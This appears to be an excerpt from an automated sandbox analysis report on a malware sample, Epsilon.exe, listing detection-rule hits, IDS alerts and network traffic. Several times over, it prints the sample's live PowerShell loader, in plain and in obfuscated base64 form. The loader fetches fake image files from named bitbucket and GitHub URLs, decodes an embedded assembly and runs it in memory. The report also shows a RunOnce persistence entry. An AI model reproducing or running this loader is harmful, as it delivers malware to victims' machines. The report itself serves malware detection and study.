-windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = 
[Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $start
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$
$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 677174b841ee7.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7344, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , ProcessId: 7416, ProcessName: wscript.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 677174b841ee7.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7344, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , ProcessId: 7416, ProcessName: wscript.exe
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 677174b841ee7.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7344, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , ProcessId: 7416, ProcessName: wscript.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Epsilon.exe, ProcessId: 7312, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $start
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 677174b841ee7.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7344, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , ProcessId: 7416, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr
$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J

        Data Obfuscation

        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param 
([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $start
        Timestamp                        SID      Severity  Classtype                      Source IP        Source Port  Destination IP  Destination Port  Protocol
        2024-12-31T00:46:01.370508+0100  2049038  1         A Network Trojan was detected  185.199.111.133  443          192.168.2.5     49704             TCP

        AV Detection

        Source: Epsilon.exe | ReversingLabs: Detection: 36%
        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF7378230EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7378230EC
        Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: Epsilon.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: wextract.pdb source: Epsilon.exe
        Source: Binary string: wextract.pdbGCTL source: Epsilon.exe
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000007.00000002.2169777517.000001A1DA5D0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 00000007.00000002.2169777517.000001A1DA5D0000.00000004.08000000.00040000.00000000.sdmp
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF73782204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF73782204C

        Software Vulnerabilities

        Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.111.133:443 -> 192.168.2.5:49704
        Source: global traffic | HTTP traffic detected: GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /rterterq/fwqfqweqwr/downloads/opkSkch.txt HTTP/1.1 | Host: bitbucket.org | Connection: Keep-Alive
        Source: Joe Sandbox View | IP Address: 185.166.143.48 185.166.143.48
        Source: Joe Sandbox View | IP Address: 185.199.111.133 185.199.111.133
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
        Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 30 Dec 2024 23:46:06 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 15006 | Server: AtlassianEdge | Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding | X-Used-Mesh: False | Content-Language: en | X-View-Name: bitbucket.apps.downloads.views.download_file | Etag: "1c2c848b4429d52ca3adbc7af471337d" | X-Dc-Location: Micros-3 | X-Served-By: b21088039ab2 | X-Version: c9b3998323c0 | X-Static-Version: c9b3998323c0 | X-Request-Count: 4163 | X-Render-Time: 0.07419872283935547 | X-B3-Traceid: 9cad47e97f70404b945b4d3a04e1fe2d | X-B3-Spanid: ac1738aebb95f397 | X-Frame-Options: SAMEORIGIN | Content-Security-Policy: base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
